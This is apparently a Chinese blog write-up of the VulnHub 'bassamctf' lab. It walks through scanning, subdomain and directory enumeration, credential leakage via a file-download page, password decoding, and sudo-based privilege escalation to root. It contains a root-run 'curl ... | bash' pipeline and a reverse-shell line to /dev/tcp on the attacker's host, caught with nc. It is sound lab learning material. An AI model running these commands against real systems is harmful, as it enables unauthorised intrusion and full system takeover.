bassamctf

最新推荐文章于 2024-09-12 08:00:00 发布

weixin_46215373

最新推荐文章于 2024-09-12 08:00:00 发布

阅读量87

点赞数

分类专栏： vulnhub靶场文章标签：网络安全

本文链接：https://blog.csdn.net/weixin_46215373/article/details/135082896

版权

vulnhub靶场专栏收录该内容

1 篇文章 0 订阅

订阅专栏

一、信息收集

先扫描

 Administrator on  ~/Desktop
 # ipconfig

Windows IP 配置


未知适配器 OpenVPN Wintun:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :


以太网适配器 Ethernet1:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::e7f5:3c67:3a01:9c17%5
   IPv4 地址 . . . . . . . . . . . . : 192.168.56.104
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

未知适配器 OpenVPN TAP-Windows6:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

以太网适配器 蓝牙网络连接:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

 Administrator on  ~/Desktop
 # nmap -sP 192.168.56.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:46 中国标准时间
Nmap scan report for 192.168.56.1
Host is up (0.0056s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0020s latency).
MAC Address: 08:00:27:BF:4C:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.0010s latency).
MAC Address: 08:00:27:74:9B:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.0010s latency).
MAC Address: 00:0C:29:EB:98:6D (VMware)
Nmap scan report for 192.168.56.104
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.41 seconds

扫描出是192.168.56.105

进行端口扫描

 Administrator on  ~/Desktop
 # nmap -A -p- 192.168.56.105
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:50 中国标准时间
Nmap scan report for 192.168.56.105
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5f:cd:98:ac:0e:76:be:d0:9c:ae:23:47:8d:03:b5:07 (RSA)
|   256 f5:cb:de:f0:89:dc:ff:56:89:44:05:3c:a3:44:8f:70 (ECDSA)
|_  256 3a:94:cc:9e:aa:ab:7d:64:71:26:49:48:02:07:62:30 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:EB:98:6D (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.15 ms 192.168.56.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.49 seconds

扫描出有22ssh和80http，系统是ubuntu

80页面为空，但是有一个网站域名

改一下host

192.168.56.105 bassam.ctf

cmd刷新一下dns

ipconfig /flushdns

能访问到网页

扫描域名，发现welcome.bassam.ctf（gobuster扫域名不好用，同样的字典扫不出来）

 Administrator on  ~/Desktop
 # ffuf  -c -u http://bassam.ctf/ -w D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt -H "Host: FUZZ.bassam.ctf" -fs 21

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.0.0
________________________________________________

 :: Method           : GET
 :: URL              : http://bassam.ctf/
 :: Wordlist         : FUZZ: D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.bassam.ctf
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 21
________________________________________________

[Status: 200, Size: 38, Words: 4, Lines: 4, Duration: 13ms]ration: [0:00:01] :: Errors: 0 ::
    * FUZZ: welcome

:: Progress: [114441/114441] :: Job [1/1] :: 293 req/sec :: Duration: [0:05:06] :: Errors: 0 :::

没什么用的提示，扫目录

 Administrator on  ~/Desktop
 # gobuster dir -u http://welcome.bassam.ctf -w D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt -x .zip,.
php,.txt,.html.php.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://welcome.bassam.ctf
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,php,txt,html.php.bak
[+] Timeout:                 10s
===============================================================
2023/12/08 11:44:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 283]
/.html.php.bak        (Status: 403) [Size: 283]
/index.php            (Status: 200) [Size: 229]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 283]
/.html.php.bak        (Status: 403) [Size: 283]
Progress: 437506 / 438325 (99.81%)
===============================================================
2023/12/08 11:46:03 Finished
===============================================================

扫到两个，index.php和config.php，查看后发现后者直接访问为空，前者为一个下载文件的网页

输入config.php下载成功，查看

二、进入系统

发现账号密码，之前发现开启了ssh，尝试登录

Last login: Sun Dec 13 10:38:10 2020 from 192.168.162.128
$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ uname -a
Linux kira 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ ls
$ pwd
/home/test
$ pwd
/home/test
$ ls
$ cd ..
$ ls
bassam  kira  test
$ ls -la
total 20
drwxr-xr-x  5 root   root   4096 Dec 13  2020 .
drwxr-xr-x 25 root   root   4096 Dec 13  2020 ..
drwxr-xr-x  2 bassam bassam 4096 Dec 13  2020 bassam
drwxr-xr-x  5 kira   kira   4096 Dec 13  2020 kira
drwxr-xr-x  4 test   test   4096 Dec 13  2020 test
$ cd  bassam
$ ls
down.sh
$ cat   down.sh
curl "http://mywebsite.test/script.sh" |bash

$ cd ..
$ cd kira
$ ls
test.sh
$ cat test.sh
echo 'your name'
read name
echo  $name >/home/kali/message.txt
$1 2>/dev/null

查看权限，之后退到根目录发现一个PassProgram文件夹

$ sudo -l
[sudo] password for test:
Sorry, user test may not run sudo on kira.

$ cd PassProgram
$ pwd
/PassProgram
$ ls
decoder  encoder
$ pwd
/PassProgram
$ cd ..
$ pwd
/

sudo不能执行在kira用户中

返回test文件夹，查看文件，发现隐藏文件夹历史bash，查看

$ cd test
$ ls -la
total 36
drwxr-xr-x 4 test test 4096 Dec  8 05:46 .
drwxr-xr-x 5 root root 4096 Dec 13  2020 ..
-rw------- 1 test test   34 Dec 13  2020 .bash_history
-rw-r--r-- 1 test test  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 test test 3771 Apr  4  2018 .bashrc
drwx------ 2 test test 4096 Dec 13  2020 .cache
drwx------ 3 test test 4096 Dec 13  2020 .gnupg
-rw-r--r-- 1 test test  807 Apr  4  2018 .profile
-rw------- 1 test test  722 Dec  8 05:46 .viminfo
$ cat .bash_history
ls
cat MySecretPassword
clear
ls
$

发现曾经查看过MySecretPassword文件，搜索

$ find / -type f -name "MySecretPassword"
find: ‘/run/lxcfs’: Permission denied
find: ‘/run/sudo’: Permission denied
find: ‘/run/cryptsetup’: Permission denied
find: ‘/run/lvm’: Permission denied
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
find: ‘/root’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/home/kira/.cache’: Permission denied
find: ‘/home/kira/.gnupg’: Permission denied
find: ‘/home/kira/.local/share’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
find: ‘/sys/fs/pstore’: Permission denied
find: ‘/sys/fs/fuse/connections/49’: Permission denied
find: ‘/lost+found’: Permission denied
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atspool’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
/var/www/ctf/MySecretPassword

进入查看

$ cat   MySecretPassword








$ file MySecretPassword
MySecretPassword: ASCII text
$ hexdump MySecretPassword
0000000 2020 2020 2020 2020 2020 2020 2020 2020
*
0000060 2020 2020 2020 2020 2020 0a20 2020 2020
0000070 2020 2020 2020 2020 2020 2020 2020 2020
*
00000d0 2020 2020 0a20 2020 2020 2020 2020 2020
00000e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000140 2020 2020 2020 2020 200a 2020 2020 2020
0000150 2020 2020 2020 2020 2020 2020 2020 2020
*
00001a0 2020 2020 2020 2020 2020 200a 2020 2020
00001b0 2020 2020 2020 2020 2020 2020 2020 2020
*
00001d0 2020 2020 2020 2020 2020 2020 0a20 2020
00001e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000200 2020 2020 2020 2020 2020 2020 2020 200a
0000210 2020 2020 2020 2020 2020 2020 2020 2020
*
0000230 2020 2020 2020 2020 2020 2020 2020 0a20
0000240 2020 2020 2020 2020 2020 2020 2020 2020
*
0000270 2020 0a20
0000274

查看后发现cat无法查看，但16进制的hexdump可以且有规律，可能是加密，之前发现了PassProgram中有decoder和encoder，可能为加密文件

$ ls -la
total 48
drwxr-xr-x  2 root root  4096 Dec 13  2020 .
drwxr-xr-x 25 root root  4096 Dec 13  2020 ..
-rwxr-xr-x  1 root root 16864 Dec 13  2020 decoder
-rwxr-xr-x  1 root root 16816 Dec 13  2020 encoder
$ ./decoder
Usage ./decoder <file to decode>
$ ./decoder /var/www/ctf/MySecretPassword
[*] Variables ready to go!
[*] File handled successfully!
[~] WORD: kira2003
[!] DONE

发现word为kira2003，可能为kira的密码

 Administrator on  ~/Desktop
 # ssh kira@192.168.56.105
kira@192.168.56.105's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  8 06:19:16 UTC 2023

  System load:  0.0                Processes:            165
  Usage of /:   21.3% of 19.56GB   Users logged in:      1
  Memory usage: 25%                IP address for ens33: 192.168.56.105
  Swap usage:   0%


258 packages can be updated.
198 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Dec 13 11:57:18 2020
kira@kira:~$
kira@kira:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on kira:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kira may run the following commands on kira:
    (bassam) /home/kira/test.sh
kira@kira:~$ ls
test.sh

提权

kira@kira:~$ sudo -u bassam ./test.sh bash
your name

/home/kira/test.sh: 3: /home/kira/test.sh: cannot create /home/kali/message.txt: Directory nonexistent
ls
test.sh
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)

现在为bassam用户，继续寻找提权

cd bassam
ls
down.sh
sudo -l
Matching Defaults entries for bassam on kira:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on kira:
    (root) NOPASSWD: /home/bassam/down.sh
sudo -u root ./down.sh bash
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
cat down.sh
curl "http://mywebsite.test/script.sh" |bash

down.sh是通过curl下载文件并通过bash执行

cat hosts
127.0.0.1 localhost
127.0.1.1 kira
192.168.56.105 mywebsite.test
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
/etc/init.d/network restart

三、提权-root

直接sudo去执行down.sh，需要bassam的密码，但是sudo -l查看权限发现

User bassam may run the following commands on kira:

(root) NOPASSWD: /home/bassam/down.sh

sudo /home/bassam/down.sh

是不需要密码的

攻击机开启python的http服务，创建script.sh，输入whoami

./down.sh
bassam
sudo ./dowm.sh
[sudo] password for bassam:
[sudo] password for bassam:
sudo /home/bassam/down.sh
root

将script.sh内容改为

sh -i >& /dev/tcp/192.168.56.104/9001 0>&1

反弹shell

攻击机开启监听

nc -lvvp 9001

靶机执行 sudo /home/bassam/down.sh

 Administrator on  ~/Desktop
 # nc -lvvp 9001
listening on [any] 9001 ...
connect to [192.168.56.104] from bassam.ctf [192.168.56.105] 44922: unknown socket error
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
down.sh
#